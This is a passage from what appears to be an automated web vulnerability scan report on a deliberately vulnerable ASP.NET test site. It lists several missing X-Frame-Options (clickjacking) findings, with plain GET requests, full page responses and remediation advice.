          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        4. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        5. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
